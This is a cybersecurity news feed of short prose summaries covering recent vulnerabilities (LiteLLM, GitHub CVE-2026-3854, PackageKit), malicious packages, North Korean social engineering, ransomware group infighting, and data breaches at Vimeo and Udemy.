Evan Tangeman, a 22-year-old from Newport Beach, California, was sentenced to 70 months in prison for laundering over $3.5 million linked to a significant cryptocurrency heist. This incident is part of a larger scheme where attackers stole approximately $230 million in digital assets. Tangeman's actions involved helping to obscure the origins of the stolen funds, which is a critical issue in the fight against cybercrime. His sentencing serves as a warning to others involved in similar activities, highlighting the legal repercussions of participating in the laundering of stolen cryptocurrencies. The case underscores ongoing concerns about the security of digital currencies and the challenges law enforcement faces in tracking illicit transactions.
Latest Cybersecurity Threats
Real-time threat intelligence from trusted sources
A North Korean cyber group known as BlueNoroff is employing fake Zoom calls to target cryptocurrency executives. They are using stolen videos of victims and AI-generated avatars to create convincing impersonations, thereby tricking potential victims into downloading malware. This tactic allows the attackers to scale their operations effectively, posing a significant risk to individuals in the cryptocurrency sector. With the rise of remote communications, such sophisticated social engineering techniques could lead to increased vulnerabilities for professionals in this industry. Companies and individuals need to be aware of these tactics and take necessary precautions to protect themselves against such targeted attacks.
BleepingComputer
Hackers are actively exploiting a serious SQL injection vulnerability, identified as CVE-2026-42208, in the LiteLLM open-source large-language model gateway. This flaw allows attackers to access sensitive information stored within the system, which could lead to unauthorized data exposure. Users of LiteLLM, particularly those managing sensitive datasets, should be aware that their systems may be at risk. The vulnerability is already being targeted in the wild, making immediate action crucial for those using the affected software. As the situation develops, it is vital for organizations to stay informed about potential exploits and take necessary precautions to protect their data.
SCM feed for Latest
A new cybersecurity threat has emerged involving a malicious Python package called 'Elfsmasher' found on the PYPI repository. This package was designed to compromise systems by stealing sensitive information and executing harmful commands. Users of Python and developers relying on this repository are particularly at risk, as they may inadvertently download the package, thinking it is legitimate. This incident highlights the vulnerabilities in software supply chains and the need for developers to be vigilant about the packages they use. Additionally, other topics covered in the article include various security incidents related to companies like Facebook and Medtronic, indicating a broader trend of increasing security challenges across multiple sectors.
Security Affairs
CVE-2026-3854Researchers have discovered a serious vulnerability in GitHub, identified as CVE-2026-3854, which allows attackers to execute arbitrary code by simply pushing a git command. This flaw affects several GitHub products, including GitHub Enterprise Cloud, GitHub Enterprise Cloud with Data Residency, and GitHub Enterprise Cloud with Enterprise. The ability to run code remotely poses significant risks, as it could lead to unauthorized access or manipulation of repositories. Companies using these GitHub services should be vigilant and take immediate action to address this vulnerability, as it could potentially compromise their code and data integrity. Ensuring that all systems are updated and secure is essential to mitigate the risks associated with this exploit.
Greg Barbaccia, the Federal Chief Information Officer, expressed caution regarding the rollout of Anthropic’s Mythos model. While he acknowledges the model's potential to enhance cybersecurity measures for the federal government, he also pointed out that there are significant uncertainties about its effectiveness in practical scenarios. Barbaccia's experience with Mythos has largely been limited to evaluations and benchmarking, which means there are still many questions about how it will perform in real-world applications. This cautious approach suggests that while the government is interested in adopting new technologies, they are wary of rushing into implementation without a clear understanding of the risks and benefits involved. The federal government’s careful stance reflects broader concerns about integrating advanced AI solutions in cybersecurity.
In an unusual turn of events, two rival ransomware groups, 0APT and KryBit, have turned on each other, leaking sensitive data about their operations. This infighting has exposed details about their infrastructure and methods, providing valuable insights into how these groups operate. Security researchers have gained access to internal documents and communications that can help in understanding ransomware tactics. This situation is significant not only because it reveals the vulnerabilities within these criminal organizations but also because it may assist law enforcement and cybersecurity professionals in combating ransomware threats more effectively. As the battle between these groups continues, the leaked information could lead to new strategies for defending against ransomware attacks.
BleepingComputer
Vimeo has confirmed that user data was accessed without authorization due to a breach at Anodot, a company specializing in data anomaly detection. This incident has raised concerns as it potentially exposes sensitive information of Vimeo customers. While Vimeo has not disclosed the exact nature of the data accessed, users need to be cautious and monitor their accounts for any suspicious activity. This breach is significant as it underscores the vulnerabilities that can arise when companies share data with third-party services. Users are advised to update their passwords and enable two-factor authentication if they haven't already.
The Hacker News
CVE-2026-3854Researchers have identified a serious security flaw in GitHub.com and GitHub Enterprise Server, designated CVE-2026-3854, which could enable an authenticated user to execute arbitrary code remotely with just a single 'git push' command. This command injection vulnerability has a CVSS score of 8.7, indicating its severity. If exploited, it could allow attackers with repository push access to take control over affected systems. This issue affects both individual developers and organizations using GitHub for version control, highlighting the need for immediate awareness and action. Users are advised to monitor their repositories closely and apply any recommended patches as they become available.
A Brazilian cybercrime group known as LofyGang has returned after a three-year hiatus, launching a campaign targeting Minecraft players through a malware called LofyStealer, also referred to as GrabBot. This malicious software is disguised as a Minecraft hack named 'Slinky' and uses the official game icon to trick users into executing it. Once installed, LofyStealer can steal sensitive information from the victim's device. This resurgence is concerning for the gaming community, as it shows that cybercriminals are still active and adapting their tactics to exploit popular platforms. Players need to be cautious about downloading third-party software, especially those that claim to enhance game performance or functionality.
Hackread – Cybersecurity News, Data Breaches, AI and More
Researchers have discovered a serious vulnerability in PackageKit, a package management tool used across various Linux distributions. This flaw, dubbed Pack2TheRoot, allows attackers to gain full root access, potentially compromising the security of affected systems. Linux distributions that utilize PackageKit, which includes many popular versions, are at risk. This vulnerability is particularly concerning because it has been present for over a decade, raising questions about the security practices in place for maintaining open-source software. Users and system administrators are urged to update their systems and apply any available patches to mitigate the risk of exploitation.
SCM feed for Latest
A new security incident has emerged involving the malicious elementary-data package version 0.23.3, which has been found to steal sensitive developer information and cryptocurrency wallet credentials. The attack took advantage of a flaw in GitHub Actions scripts, allowing the attacker to inject shell code that exposed a GitHub token. This means that anyone using this version of the package could be at risk, potentially compromising their projects and financial assets. Developers and organizations using this package need to take immediate action to secure their systems and prevent unauthorized access to their data. The incident serves as a reminder of the vulnerabilities that can arise in software development environments, particularly when integrating third-party packages.
SecurityWeek
Vimeo has confirmed that it experienced a data breach affecting user and customer information. The ShinyHunters group claims to possess stolen files and is demanding a ransom to prevent them from leaking this data. This breach raises concerns about the security of Vimeo's platform and the potential exposure of sensitive user information. Affected individuals may face risks such as identity theft or unauthorized access to their accounts. Vimeo's response to the ransom demand and their plans for securing user data will be critical in addressing the fallout from this incident.
SCM feed for Latest
Recent legislation has sparked bipartisan criticism as it reauthorizes Section 702 of the Foreign Intelligence Surveillance Act for another three years. House Speaker Mike Johnson introduced this bill after a brief 10-day extension was approved, following unsuccessful attempts to secure an 18-month renewal. Critics from both political parties express concerns about privacy and the implications of ongoing surveillance practices. This legislation allows government agencies to collect foreign intelligence, but opponents argue it risks infringing on the rights of American citizens. The backlash indicates a growing unease regarding surveillance programs and their oversight, raising questions about the balance between national security and individual privacy.
SCM feed for Latest
Udemy, a popular e-learning platform, has reportedly suffered a data breach involving more than 1.4 million user records. The ShinyHunters group, known for extortion tactics, claimed responsibility and is threatening to release the stolen data if Udemy does not engage in negotiations by April 27. This breach raises concerns for users about the potential exposure of personal information, which could lead to identity theft or phishing attacks. Companies like Udemy need to take swift action to protect their users and secure their systems against further attacks. The incident highlights the ongoing risks that online platforms face from cybercriminals seeking to exploit vulnerabilities for profit.